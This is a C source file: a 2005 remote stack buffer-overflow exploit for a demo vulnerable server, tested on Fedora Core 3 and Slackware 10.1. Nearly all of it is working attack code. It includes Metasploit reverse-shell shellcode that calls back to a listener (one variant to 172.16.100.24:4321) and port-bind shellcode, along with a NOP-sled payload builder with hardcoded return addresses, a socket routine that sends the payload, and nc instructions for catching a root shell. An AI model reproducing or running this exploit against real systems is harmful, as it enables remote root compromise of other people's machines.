/** ======================================================== My remote demo exploit v1.4, BOF Vulnerable Server by Hugo Martin www.hackcraft.com (2005) ======================================================== Tested on: Fedora Core 3, Slackware v10.1 > Run the Server (with root) Server#> ./vulnserversp 8888 HM: get_sp: 0xbffff718 > Run the listener needed to receive the shell (If used Shellcode :4321) client1> nc -lp 4321 id > Run my exploit client2> ./rxvulnerable localhost 8888 ================================================================= ./vulnserversp Demo Remote BOF Exploit by Hugo Martin [ www.hackcraft.com ] ================================================================= RET: 0xbffff5e8 BUF: 1063 Shellcode Length: 96 > If exploit successfull this will appear automagically: client1> nc -lp 4321 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) **/ #include #include #include // Reverse Shellcode, you have to do: "$nc -lp 4321" to wait for the reverse shell // linux_ia32_reverse - LHOST=127.0.0.1 LPORT=4321 Size=96 Encoder=PexFnstenvSub http://metasploit.com unsigned char shellcode[] = "\x33\xc9\x83\xe9\xee\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa7" "\x86\x26\xeb\x83\xeb\xfc\xe2\xf4\x96\x5d\x75\xa8\xf4\xec\x24\x81" "\xc1\xde\xaf\x0a\x6a\x06\xb5\xb2\x17\xb9\xeb\x6b\xee\xff\xdf\xb0" "\xfd\xee\x59\xeb\xa7\x87\x40\x83\xb7\x67\x65\x8d\xf4\x0f\xc7\x5b" "\xc1\xd6\x77\xb8\x2e\x67\x65\x26\x27\xd4\x4e\xc4\x88\xf5\x4e\x83" "\x88\xe4\x4f\x85\x2e\x65\x74\xb8\x2e\x67\x96\xe0\x6a\x06\x26\xeb"; // linux_ia32_reverse - LHOST=172.16.100.24 LPORT=4321 Size=96 Encoder=PexFnstenvSub http://metasploit.com /** unsigned char scode[] = "\x33\xc9\x83\xe9\xee\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa7" "\x86\x26\xeb\x83\xeb\xfc\xe2\xf4\x96\x5d\x75\xa8\xf4\xec\x24\x81" "\xc1\xde\xaf\x0a\x6a\x06\xb5\xb2\x17\xb9\xeb\x6b\xee\xff\xdf\xb0" "\xfd\xee\x8a\xfb\xc3\x9e\x40\x83\xb7\x67\x65\x8d\xf4\x0f\xc7\x5b" "\xc1\xd6\x77\xb8\x2e\x67\x65\x26\x27\xd4\x4e\xc4\x88\xf5\x4e\x83" "\x88\xe4\x4f\x85\x2e\x65\x74\xb8\x2e\x67\x96\xe0\x6a\x06\x26\xeb"; **/ // Special Port Bind shellcode [0.0.0.0:44800] /** char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1" "\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd" "\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xaf\x66\x89\x46\x0e\x8d\x46\x0c\x89" "\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb" "\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89" "\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80" "\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06" "\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd" "\x80\xe8\x5b\xff\xff\xff"; **/ // RET: Probably you'll need to modify it (use GDB) // To debug an already running process use this: // #gdb vulnerablesp PID // .. get PID with: #ps -ef | grep vulnerablesp //find RET with gdb>x/200bx $esp-200 and locate start of testing NOPs #define RET 0xbffff5e8 // OR 0xbffff620 //Slackware 10.1 // RET Fedora Core 3 : 0xbffff790 // RET Slackware v10.1 : 0xbffff5e8 // OR 0xbffff620 // RET other : 0xbffff7b0 int main(int argc,char *argv[]) { printf("=================================================================\n"); printf(" ./vulnserversp Demo Remote BOF Exploit \n"); printf(" by Hugo Martin [ www.hackcraft.com ] \n"); printf("=================================================================\n\n"); char buffer[1064]; //we will override 1024 to own EIP int s, i, size; struct sockaddr_in remote; struct hostent *host; if(argc!=3) { printf("Usage: %s target-ip port \n",argv[0]); return -1; } /////////////////// CREATING OUR SPECIAL BUFFER //////////////////// [begins] //fill the buffer with NOPs memset(buffer, 0x90, 1064); //Copy the shellcode into the buffer memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode)); //Lo anterior provoca un Nullbyte no intencional en buffer[1000] buffer[1000] = 0x90; // así que le metemos un NOP para sacar el Nullbyte //Le metemos RET desde 1022 hasta 1059 [RET][RET][RET][RET][RET][RET] for(i = 1022; i < 1059; i+=4) { *((int *) &buffer[i]) = RET; // RET is the returnaddress we want to use... #define in the header } buffer[1063] = 0x0; //Nullbyte to close our prepared buffer /////////////////// CREATING OUR SPECIAL BUFFER //////////////////// [ends] //getting hostname host = gethostbyname(argv[1]); if (host==NULL) { fprintf(stderr,"Unknown Host %s \n",argv[1]); return -1; } //creating socket s=socket(AF_INET,SOCK_STREAM,0); if (s<0) { fprintf(stderr,"Error: Socket \n"); return -1; } //state Protocolfamily, then converting the hostname or IP address, //and getting port number remote.sin_family = AF_INET; remote.sin_addr = *((struct in_addr *)host->h_addr); remote.sin_port = htons(atoi(argv[2])); //connecting with destination host if(connect(s,(struct sockaddr *)&remote, sizeof(remote))==-1) { close(s); fprintf(stderr,"Error: connect \n"); return -1; } //sending exploit string size=send(s,buffer,sizeof(buffer),0); if(size==-1) { close(s); fprintf(stderr,"sending data failed\n"); return -1; } //closing socket close(s); printf("RET: 0x%x\n",RET); printf("BUF: %d\n",strlen(buffer)); printf("Shellcode Length: %d\n\n",strlen(shellcode)); printf("-> If used: Reverse shellcode [0.0.0.0:4321]\n"); printf(" -> You should now be able to type commands in your $nc -lp 4321 terminal. \n\n"); printf("-> If used: Special Port Bind shellcode [0.0.0.0:44800]\n"); printf(" -> If everything went ok, to get a shell you should now type: \n"); printf(" -> $ nc -vv %s 44800 OR \n",argv[1]); printf(" -> $ telnet %s 44800 \n\n",argv[1]); }